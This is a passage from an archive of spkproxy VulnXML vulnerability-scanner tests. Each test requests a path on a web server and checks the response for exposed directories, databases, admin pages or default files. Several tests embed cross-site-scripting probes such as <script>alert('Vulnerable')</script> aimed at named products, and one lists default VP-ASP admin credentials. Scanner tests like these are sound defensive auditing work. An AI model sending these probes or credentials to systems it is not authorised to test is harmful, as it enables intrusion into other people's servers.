unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-448.xml0100664000076500007650000000703607566204543017572 0ustar davedave (reports/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /reports/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-449.xml0100664000076500007650000000704007566204543017566 0ustar davedave (reseller/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /reseller/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-44.xml0100664000076500007650000000725307566204543017503 0ustar davedave (index.html.nl) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.nl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-450.xml0100664000076500007650000000704407566204543017562 0ustar davedave (restricted/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /restricted/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-451.xml0100664000076500007650000000703407566204543017562 0ustar davedave (retail/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /retail/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-452.xml0100664000076500007650000000706207566204543017564 0ustar davedave (reviews/newpro.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /reviews/newpro.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-453.xml0100664000076500007650000000705207566204543017564 0ustar davedave (root/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /root/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-454.xml0100664000076500007650000000712507566204543017566 0ustar davedave (rtm.log) "Rich Media's JustAddCommerce allows retrieval of a log file 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /rtm.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ HttpPost Retry 200 HttpPost Retry 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-455.xml0100664000076500007650000000703207566204543017564 0ustar davedave (sales/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sales/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-456.xml0100664000076500007650000000746207566204543017574 0ustar davedave (script>alert('Vulnerable')</script>.cfm) "Macromedia's ColdFusion MX server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Patch or upgrade to a newer version 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /script>alert('Vulnerable')</script>.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-457.xml0100664000076500007650000000707007566204543017570 0ustar davedave (scripts) "Remote scripts directory is browsable." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-458.xml0100664000076500007650000000705207566204543017571 0ustar davedave (scripts/weblog) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/weblog HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-459.xml0100664000076500007650000000704207566204543017571 0ustar davedave (search.vts) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search.vts HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-45.xml0100664000076500007650000000725307566204543017504 0ustar davedave (index.html.nn) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.nn HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-460.xml0100664000076500007650000000712007566204543017556 0ustar davedave (search/) "Default iPlanet search is enabled." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Sample Search Interface 200 Sample Search Interface 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-461.xml0100664000076500007650000000704607566204543017566 0ustar davedave (search97.vts) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search97.vts HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-462.xml0100664000076500007650000000703407566204543017564 0ustar davedave (secret/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /secret/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-463.xml0100664000076500007650000000705607566204543017571 0ustar davedave (secure/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /secure/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-464.xml0100664000076500007650000000706007566204543017565 0ustar davedave (securecontrolpanel/) "Web Server Control Panel" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /securecontrolpanel/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-465.xml0100664000076500007650000000706007566204543017566 0ustar davedave (secured/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /secured/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-466.xml0100664000076500007650000000703007566204543017564 0ustar davedave (sell/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sell/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-467.xml0100664000076500007650000000707207566204543017573 0ustar davedave (server_stats/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /server_stats/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-468.xml0100664000076500007650000000714407566204543017574 0ustar davedave (SetSecurity.shm) "Cisco System's My Access for Wireless... This resource should be password protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SetSecurity.shm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-469.xml0100664000076500007650000000752707566204543017602 0ustar davedave (setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P) "CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-46.xml0100664000076500007650000000725307566204543017505 0ustar davedave (index.html.no) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.no HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-470.xml0100664000076500007650000000703207566204543017561 0ustar davedave (setup/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /setup/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-471.xml0100664000076500007650000000747107566204543017571 0ustar davedave (sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>) "Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). CAN-2002-0375. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-472.xml0100664000076500007650000000703007566204543017561 0ustar davedave (shop/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /shop/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-473.xml0100664000076500007650000000716407566204543017572 0ustar davedave (shopadmin.asp) "VP-ASP shopping cart admin mayy be available via the web. Default ID/PW are vpasp/vpasp and admin/admin." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /shopadmin.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-474.xml0100664000076500007650000000724707566204543017575 0ustar davedave (shopa_sessionlist.asp) "VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /shopa_sessionlist.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-475.xml0100664000076500007650000000726407566204543017575 0ustar davedave (shopdbtest.asp) "VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase)." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /shopdbtest.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ xDatabase 200 xDatabase 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-476.xml0100664000076500007650000000703607566204543017573 0ustar davedave (shopper/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /shopper/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-477.xml0100664000076500007650000000724107566204543017572 0ustar davedave (shopping300.mdb) "VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /shopping300.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-478.xml0100664000076500007650000000724107566204543017573 0ustar davedave (shopping400.mdb) "VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /shopping400.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-479.xml0100664000076500007650000000707307566204543017577 0ustar davedave (SilverStream) "SilverStream allows directory listing" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SilverStream HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ /Pages 200 /Pages 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-47.xml0100664000076500007650000000727707566204543017514 0ustar davedave (index.html.po.iso8859-2) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.po.iso8859-2 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-480.xml0100664000076500007650000000705607566204543017570 0ustar davedave (site/iissamples/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /site/iissamples/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-481.xml0100664000076500007650000000711507566204543017565 0ustar davedave (siteminder) "This may be an indication that the server is running Siteminder for SSO" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /siteminder HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify 